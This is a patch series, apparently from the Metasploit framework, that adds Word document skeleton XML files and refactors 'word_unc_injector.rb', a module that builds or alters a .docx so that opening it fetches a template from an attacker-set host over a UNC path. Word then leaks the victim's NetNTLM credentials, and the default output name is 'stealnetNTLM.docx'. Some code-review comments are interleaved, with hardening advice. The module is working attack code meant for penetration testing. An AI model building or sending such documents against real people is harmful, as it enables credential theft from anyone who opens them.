w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException 
w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Bibliography" w:uiPriority="37"/><w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/></w:latentStyles><w:style w:type="paragraph" w:default="1" 
w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:rsid w:val="00B25E88"/><w:rPr><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont"><w:name w:val="Default Paragraph Font"/><w:uiPriority w:val="99"/><w:semiHidden/></w:style><w:style w:type="table" w:default="1" w:styleId="TableNormal"><w:name w:val="Normal Table"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/><w:qFormat/><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style><w:style w:type="numbering" w:default="1" w:styleId="NoList"><w:name w:val="No List"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/></w:style></w:styles> \ No newline at end of file diff --git a/data/exploits/docx/word/theme/theme1.xml b/data/exploits/docx/word/theme/theme1.xml new file mode 100644 index 000000000000..a06c80529b6c --- /dev/null +++ b/data/exploits/docx/word/theme/theme1.xml 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme"><a:themeElements><a:clrScheme name="Office"><a:dk1><a:sysClr val="windowText" lastClr="000000"/></a:dk1><a:lt1><a:sysClr val="window" lastClr="FFFFFF"/></a:lt1><a:dk2><a:srgbClr val="1F497D"/></a:dk2><a:lt2><a:srgbClr val="EEECE1"/></a:lt2><a:accent1><a:srgbClr val="4F81BD"/></a:accent1><a:accent2><a:srgbClr val="C0504D"/></a:accent2><a:accent3><a:srgbClr val="9BBB59"/></a:accent3><a:accent4><a:srgbClr val="8064A2"/></a:accent4><a:accent5><a:srgbClr val="4BACC6"/></a:accent5><a:accent6><a:srgbClr val="F79646"/></a:accent6><a:hlink><a:srgbClr val="0000FF"/></a:hlink><a:folHlink><a:srgbClr val="800080"/></a:folHlink></a:clrScheme><a:fontScheme name="Office"><a:majorFont><a:latin typeface="Cambria"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS ゴシック"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Times New Roman"/><a:font script="Hebr" typeface="Times New Roman"/><a:font script="Thai" typeface="Angsana New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="MoolBoran"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" 
typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Times New Roman"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:majorFont><a:minorFont><a:latin typeface="Calibri"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS 明朝"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Arial"/><a:font script="Hebr" typeface="Arial"/><a:font script="Thai" typeface="Cordia New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="DaunPenh"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Arial"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:minorFont></a:fontScheme><a:fmtScheme name="Office"><a:fillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="50000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="35000"><a:schemeClr val="phClr"><a:tint val="37000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr 
val="phClr"><a:tint val="15000"/><a:satMod val="350000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="1"/></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:shade val="51000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="80000"><a:schemeClr val="phClr"><a:shade val="93000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="94000"/><a:satMod val="135000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="0"/></a:gradFill></a:fillStyleLst><a:lnStyleLst><a:ln w="9525" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"><a:shade val="95000"/><a:satMod val="105000"/></a:schemeClr></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="25400" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="38100" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln></a:lnStyleLst><a:effectStyleLst><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="38000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst><a:scene3d><a:camera prst="orthographicFront"><a:rot lat="0" lon="0" rev="0"/></a:camera><a:lightRig rig="threePt" dir="t"><a:rot lat="0" lon="0" rev="1200000"/></a:lightRig></a:scene3d><a:sp3d><a:bevelT w="63500" h="25400"/></a:sp3d></a:effectStyle></a:effectStyleLst><a:bgFillStyleLst><a:solidFill><a:schemeClr 
val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="40000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="40000"><a:schemeClr val="phClr"><a:tint val="45000"/><a:shade val="99000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="20000"/><a:satMod val="255000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="-80000" r="50000" b="180000"/></a:path></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="80000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="30000"/><a:satMod val="200000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="50000" r="50000" b="50000"/></a:path></a:gradFill></a:bgFillStyleLst></a:fmtScheme></a:themeElements><a:objectDefaults/><a:extraClrSchemeLst/></a:theme> \ No newline at end of file diff --git a/data/exploits/docx/word/webSettings.xml b/data/exploits/docx/word/webSettings.xml new file mode 100644 index 000000000000..b4a16977f713 --- /dev/null +++ b/data/exploits/docx/word/webSettings.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings> \ No newline at end of file diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 95410ef7cf4d..147b3dfd0bc1 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb 
@@ -6,10 +6,13 @@ ## require 'msf/core' -require 'zip/zip' +require 'zip/zip' #for extracting files +require 'rex/zip' #for creating files class Metasploit3 < Msf::Auxiliary + include Msf::Exploit::FILEFORMAT + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Word UNC Path Injector', @@ -22,7 +25,6 @@ def initialize(info = {}) 2007 and 2010 as of Januari 2013 date by using auxiliary/server/capture/smb }, 'License' => MSF_LICENSE, - 'Version' => '$Revision: 1 $', 'References' => [ [ 'URL', 'http://jedicorp.com/?p=534' ], 
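Review bot: The require list added here does not cover everything the new code uses: later hunks call `Dir.tmpdir` and `FileUtils.mkdir_p`/`FileUtils.rm_rf`, which come from the `tmpdir` and `fileutils` standard libraries. They may already be loaded through `msf/core`, but that is not visible in this diff, so I would add `require 'tmpdir'` and `require 'fileutils'` next to `require 'rex/zip'` to keep the module self-contained. A space after `#` in the two trailing comments (`# for extracting files`) would also match common Ruby style.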
@@ -35,114 +37,123 @@ def initialize(info = {}) register_options( [ - OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to','']), - OptString.new('SRCFILE', [false, '.docx file to backdoor. If left empty, creates an emtpy document', '']), - OptString.new('SKLFILENAME', [false,'Document output filename', 'stealnetNTLM.docx']), - OptPath.new('SKLOUTPUTPATH', [false, 'The location where the backdoored empty .docx file will be written','./']), - OptString.new('SKLDOCAUTHOR',[false,'Document author for skeleton document', 'SphaZ']), + OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to.','']), + OptString.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document', '']), + OptString.new('FILENAME', [true, 'Document output filename.', 'stealnetNTLM.docx']), + OptString.new('DOCAUTHOR',[false,'Document author for empty document.', 'SphaZ']), ], self.class) end - - #here we create an empty .docx file with the UNC path. Only done when SRCFILE is empty + #here we create an empty .docx file with the UNC path. 
Only done when FILENAME is empty def makeNewFile metadataFileData = "" metadataFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties" metadataFileData << " xmlns:cp=\"http://schemas.openxmlformats.org/package/2006/metadata/core-properties\" " metadataFileData << "xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" " metadataFileData << "xmlns:dcmitype=\"http://purl.org/dc/dcmitype/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">" - metadataFileData << "<dc:creator>#{datastore['SKLDOCAUTHOR']}</dc:creator><cp:lastModifiedBy>#{datastore['SKLDOCAUTHOR']}" + metadataFileData << "<dc:creator>#{datastore['DOCAUTHOR']}</dc:creator><cp:lastModifiedBy>#{datastore['DOCAUTHOR']}" metadataFileData << "</cp:lastModifiedBy><cp:revision>1</cp:revision><dcterms:created xsi:type=\"dcterms:W3CDTF\">" metadataFileData << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">" metadataFileData << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>" - #Lets get the local filepath to figure out where we need to write the metadata file - metadataFileName = File.dirname(self.file_path)+'/sourcedoc/docProps/core.xml' + #where to find the skeleton files required for creating an empty document + dataDir = File.join(Msf::Config.install_root, "data", "exploits", "docx") + tmpDir = "#{Dir.tmpdir}/unc_tmp" + + #setup temporary directory structure begin - if File.exists?(metadataFileName) - vprint_status("Deleting metadatafile") - File.delete(metadataFileName) - end - fd = File.open( metadataFileName, 'wb+' ) - fd.puts(metadataFileData) - fd.close + cleanupTmp(tmpDir) + FileUtils.mkdir_p("#{tmpDir}/docProps/") + FileUtils.mkdir_p("#{tmpDir}/word/_rels/") rescue - print_error("Cant write to #{metadataFileName} make sure module and data are intact") + print_error("Error generating temp directory structure.") return nil - end + end - #now lets write the _rels file that 
contains the UNC path - refdataFileName = File.dirname(self.file_path) + '/sourcedoc/word/_rels/settings.xml.rels' + #here we store our on-the-fly created files begin - fd = File.open( refdataFileName, 'wb+' ) - fd.puts(@relsFileData) - fd.close + f = File.open("#{tmpDir}/docProps/core.xml", 'wb') + f.write(metadataFileData) + f.close() + f = File.open("#{tmpDir}/word/_rels/settings.xml.rels", 'wb') + f.write(@relsFileData) + f.close() rescue - print_error("Cant write to #{refdataFileName} make sure module and data are intact.") - return nil - end - - #and finally, lets creat the .docx file - inputPath = File.dirname(self.file_path) + '/sourcedoc/' - inputPath.sub!(%r[/S],'') - - archive = File.join(datastore['SKLOUTPUTPATH'], datastore['SKLFILENAME']) - #if file exists, lets not overwrite - if File.exists?(archive) - print_error("Output file #{archive} already exists! Set a different name for SKLOUTPUTPATH and/or SKLFILENAME.") + print_error("Cant write to temp file.") + cleanupTmp(tmpDir) return nil end - if zipDocx(inputPath, archive, false).nil? + #making the actual docx + begin + docx = Rex::Zip::Archive.new + #add skeleton files + vprint_status("Adding skeleton files from #{dataDir}") + Dir["#{dataDir}/**/**"].each do |file| + if not File.directory?(file) + docx.add_file(file.sub(dataDir,''), File.read(file)) + end + end + #add on-the-fly created documents + vprint_status("Adding injected files") + Dir["#{Dir.tmpdir}/unc_tmp/**/**"].each do |file| + if not File.directory?(file) + docx.add_file(file.sub("#{Dir.tmpdir}/unc_tmp/",''), File.read(file)) + end + end + #add the otherwise skipped "hidden" file + file = "#{dataDir}/_rels/.rels" + docx.add_file(file.sub(dataDir,''), File.read(file)) + file_create(docx.pack) + rescue + print_error("Error creating empty document #{datastore['FILENAME']}") + cleanupTmp(tmpDir) return nil end - + + cleanupTmp(tmpDir) + return 0 + end + + #cleaning up of temporary files. 
If it fails we say so, but continue anyway + def cleanupTmp(dir) begin - #delete the created xml files, the less evidence of parameters used the better - File.delete(File.dirname(self.file_path)+'/sourcedoc/docProps/core.xml') - File.delete(File.dirname(self.file_path) + '/sourcedoc/word/_rels/settings.xml.rels') + FileUtils.rm_rf(dir) rescue - print_error("Error deleting local core and settings documents. Generating new file worked though") + print_error("Error cleaning up tmp directory structure.") end - return 0 end - #this bit checks the settings.xml and looks for the relations file entry we need for our evil masterplan. - #and then inserts the UNC path into the _rels file. + #here we inject an UNC path into an existing file, and store the injected file in FILENAME def manipulateFile + #where do we unpack our source file? + tmpDir = "#{Dir.tmpdir}/#{Time.now.to_i}#{rand(1000)}/" ref = "<w:attachedTemplate r:id=\"rId1\"/>" - if File.exists?(datastore['SRCFILE']) - if File.stat(datastore['SRCFILE']).readable? and File.stat(datastore['SRCFILE']).writable? - vprint_status("We can read and write the file, this is probably a good thing :P") - else - print_error("Not enough rights to modify the file. Aborting.") + if File.exists?(datastore['SOURCE']) + if not File.stat(datastore['SOURCE']).readable? + print_error("Not enough rights to read the file. Aborting.") return nil end - fileContent = getFileFromDocx("word/settings.xml") - if fileContent.nil? + #lets extract our docx + if unzipDocx(tmpDir).nil? return nil - end + end + fileContent = File.read("#{tmpDir}/word/settings.xml") + if not fileContent.index("w:attachedTemplate r:id=\"rId1\"").nil? vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") - #and we put just our rels file into the docx - if unzipDocx.nil? - return nil - end - if updateDocxFile("word/_rels/settings.xml.rels", @relsFileData).nil? 
+ + #we put just our rels file into the docx + if updateDocxFile(tmpDir,"word/_rels/settings.xml.rels", @relsFileData).nil? return nil end - #ok we got through this, lets zip the file, overwriting the original in this case - begin - File.delete(datastore['SRCFILE']) - if zipDocx(@tmpDir, datastore['SRCFILE'],true).nil? - return nil - end - rescue - print_error("Can't modify the original document :(") + + # lets zip the end result + if zipDocx(tmpDir).nil? return nil end else 
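Review bot: Both temporary directories in this hunk are built from guessable names under the shared temp directory: `tmpDir = "#{Dir.tmpdir}/unc_tmp"` in `makeNewFile` and `tmpDir = "#{Dir.tmpdir}/#{Time.now.to_i}#{rand(1000)}/"` in `manipulateFile`. On a multi-user host another local account can pre-create or symlink that path before `FileUtils.rm_rf` and `mkdir_p` run, and two concurrent runs of the module would share `unc_tmp`. `Dir.mktmpdir` creates a uniquely named, owner-only directory, so I would use `tmpDir = Dir.mktmpdir('unc_')` in both places, drop the `cleanupTmp(tmpDir)` call that precedes `mkdir_p`, and glob `Dir["#{tmpDir}/**/**"]` instead of repeating the literal path. Separately, the early `return nil` branches after `updateDocxFile` in `manipulateFile` leave the extracted document behind in the temp directory; a `cleanupTmp(tmpDir)` before each return would fix that. `manipulateFile` continues past the end of this hunk.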
@@ -154,166 +165,128 @@ def manipulateFile if not insertTwo.nil? vprint_status("HypenationZone found, we use this for insertion.") fileContent.insert(insertTwo, ref ) - end + end else vprint_status("DefaultTabStop found, we use this for insertion.") fileContent.insert(insertOne, ref ) - end + end if insertOne.nil? && insertTwo.nil? - vprint_error("Cannot find insert point for reference into settings.xml") + print_error("Cannot find insert point for reference into settings.xml") + cleanupTmp(tmpDir) return nil end - if unzipDocx.nil? + #lets extract our docx + if unzipDocx(tmpDir).nil? return nil end - #update the settings files - if updateDocxFile("word/settings.xml",fileContent).nil? + + #update the files that contain the injection and reference + if updateDocxFile(tmpDir, "word/settings.xml",fileContent).nil? print_error("Error inserting data into word/settings.xml") return nil end - if updateDocxFile("word/_rels/settings.xml.rels", @relsFileData).nil? + if updateDocxFile(tmpDir, "word/_rels/settings.xml.rels", @relsFileData).nil? print_error("Eror inserting data into word/_rels/settings.xml.rels") return nil end - #ok we got through this, lets zip the file, overwriting the original in this case - begin - File.delete(datastore['SRCFILE']) - if zipDocx(@tmpDir, datastore['SRCFILE'],true).nil? - return nil - end - rescue - print_error("Can't modify the original document :(") + + #lets zip the file + if zipDocx(tmpDir).nil? return nil end end else - print_error("File #{datastore['SRCFILE']} does not exist. 
Aborting.") + print_error("File #{datastore['SOURCE']} does not exist.") return nil end + cleanupTmp(tmpDir) return 0 end - #read a file from .docx into a string - def getFileFromDocx(fileString) + #making the actual docx + def zipDocx(tmpDir) begin - Zip::ZipFile.open(datastore['SRCFILE']) do |fileZip| - fileZip.each do |f| - next unless f.to_s == fileString - return f.get_input_stream.read + docx = Rex::Zip::Archive.new + #add skeleton files + vprint_status("Adding files from #{tmpDir}") + Dir["#{tmpDir}/**/**"].each do |file| + if not File.directory?(file) + docx.add_file(file.sub(tmpDir,''), File.read(file)) end end - fileZip.close - print_error("Cant find #{fileString} inside the .docx") - return nil + #add the otherwise skipped "hidden" file + file = "#{tmpDir}/_rels/.rels" + docx.add_file(file.sub(tmpDir,''), File.read(file)) + file_create(docx.pack) rescue - print_error("Unknown error reading docx file.") - fileZip.close + print_error("Error creating compressed document #{datastore['FILENAME']}") + cleanupTmp(tmpDir) return nil end - fileZip.close end - def zipDocx(inputPath, archive, delsource) + #unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way + def unzipDocx(tmpDir) begin - #add the prepared files to the zip file - Zip::ZipFile.open(archive, 'wb') do |fileZip| - Dir["#{inputPath}/**/**"].reject{|f|f==archive}.each do |file| - fileZip.add(file.sub(inputPath+'/',''), file) - end - relsFile = inputPath + '/_rels/.rels' - fileZip.add(relsFile.sub(inputPath+'/',''), relsFile) - end - rescue - print_error("Error zipping file..") - begin - FileUtils.rm_rf(inputPath) - rescue - print_error("Cant even clean up my own mess, I give up") - return nil - end - return nil - end - #do we delete the source? 
- if delsource - begin - FileUtils.rm_rf(inputPath) - rescue - print_error("Cant even clean up my own mess, I give up") - end - end - return 0 - end - - def unzipDocx - begin - vprint_status("tmpdir: #{@tmpDir}") - if not File.directory?(@tmpDir) - vprint_status("Damn rubyzip cant be relied upon, so we do it the hard way. Extracting #{datastore['SRCFILE']}") - Zip::ZipFile.open(datastore['SRCFILE']) do |fileZip| + if not File.directory?(tmpDir) + vprint_status("Damn rubyzip cant be relied upon, so we do it the hard way. Extracting #{datastore['SOURCE']}") + Zip::ZipFile.open(datastore['SOURCE']) do |fileZip| fileZip.each do |entry| - if not entry.nil? - vprint_status("extracting entry: #{entry.name}") - end - fpath = File.join(@tmpDir, entry.name) + fpath = File.join(tmpDir, entry.name) FileUtils.mkdir_p(File.dirname(fpath)) fileZip.extract(entry, fpath) end end end rescue - print_error("There was an error unzipping") + print_error("There was an error unzipping.") + cleanupTmp(tmpDir) return nil end return 0 end #used for updating the files inside the docx from a string - def updateDocxFile(fileString, content) + def updateDocxFile(tmpDir,fileString, content) begin - #ok so now we unpacked the docx file, lets start to update the file we need to do - #does the file already exist? 
- archive = File.join(@tmpDir, fileString) + archive = File.join(tmpDir, fileString) vprint_status("We need to look for: #{archive}") if File.exists?(archive) vprint_status("Deleting original file #{archive}") File.delete(archive) end - #now lets put OUR file there File.open(archive, 'wb+') { |f| f.write(content) } rescue Exception => ex print_error("Well, extracting and manipulating the file went wrong :(") + cleanupTmp(tmpDir) return nil end return 0 end def run - #we need this in in bot makeNewFile and manipulateFile + #we need this in makeNewFile and manipulateFile @relsFileData = "" @relsFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp @relsFileData << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp @relsFileData << "<Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/".chomp @relsFileData << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>" - #where do we unpack our file? - @tmpDir = "#{Dir.tmpdir}/#{Time.now.to_i}#{rand(1000)}/" - if "#{datastore['SRCFILE']}" == "" + if "#{datastore['SOURCE']}" == "" #make an empty file print_status("Creating empty document") if not makeNewFile.nil? - print_good("Success! Document #{datastore['SKLFILENAME']} created in #{datastore['SKLOUTPUTPATH']}") + print_good("Success! Empty document #{datastore['FILENAME']} created.") end else #extract the word/settings.xml and edit in the reference we need print_status("Injecting UNC path into existing document.") if not manipulateFile.nil? - print_good("Success! Document #{datastore['SRCFILE']} now references to #{datastore['LHOST']}") - else - print_error("Something went wrong!") + print_good("Copy of #{datastore['SOURCE']} called #{datastore['FILENAME']} points to #{datastore['LHOST']}.") end end end From 145cf618aa8b4ab32c1c679d669ebf0b3055f628 Mon Sep 17 00:00:00 2001 
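Review bot: In `unzipDocx`, `fpath = File.join(tmpDir, entry.name)` uses the archive entry name unchecked, so a SOURCE document whose entries contain `../` or an absolute path would be extracted outside `tmpDir` on the operator's machine. Resolve the path and skip anything that leaves the directory before the `mkdir_p` and `extract` calls, for example `fpath = File.expand_path(entry.name, tmpDir)` followed by `next unless fpath.start_with?(File.expand_path(tmpDir) + File::SEPARATOR)`. Separately, `zipDocx` ends on `file_create(docx.pack)` with no explicit `return 0`, unlike `unzipDocx` and `updateDocxFile`. Because `manipulateFile` tests the result with `.nil?`, it is worth confirming that `file_create` never returns nil on success, or adding the explicit return.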
From: SphaZ <cyberphaz@gmail.com> Date: Mon, 4 Feb 2013 13:51:01 +0100 Subject: [PATCH 260/421] msftidy --- modules/auxiliary/docx/word_unc_injector.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 147b3dfd0bc1..ccf94a838f6e 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -56,7 +56,7 @@ def makeNewFile metadataFileData << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">" metadataFileData << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>" - #where to find the skeleton files required for creating an empty document + #where to find the skeleton files required for creating an empty document dataDir = File.join(Msf::Config.install_root, "data", "exploits", "docx") tmpDir = "#{Dir.tmpdir}/unc_tmp" @@ -68,7 +68,7 @@ def makeNewFile rescue print_error("Error generating temp directory structure.") return nil - end + end #here we store our on-the-fly created files begin @@ -91,14 +91,14 @@ def makeNewFile vprint_status("Adding skeleton files from #{dataDir}") Dir["#{dataDir}/**/**"].each do |file| if not File.directory?(file) - 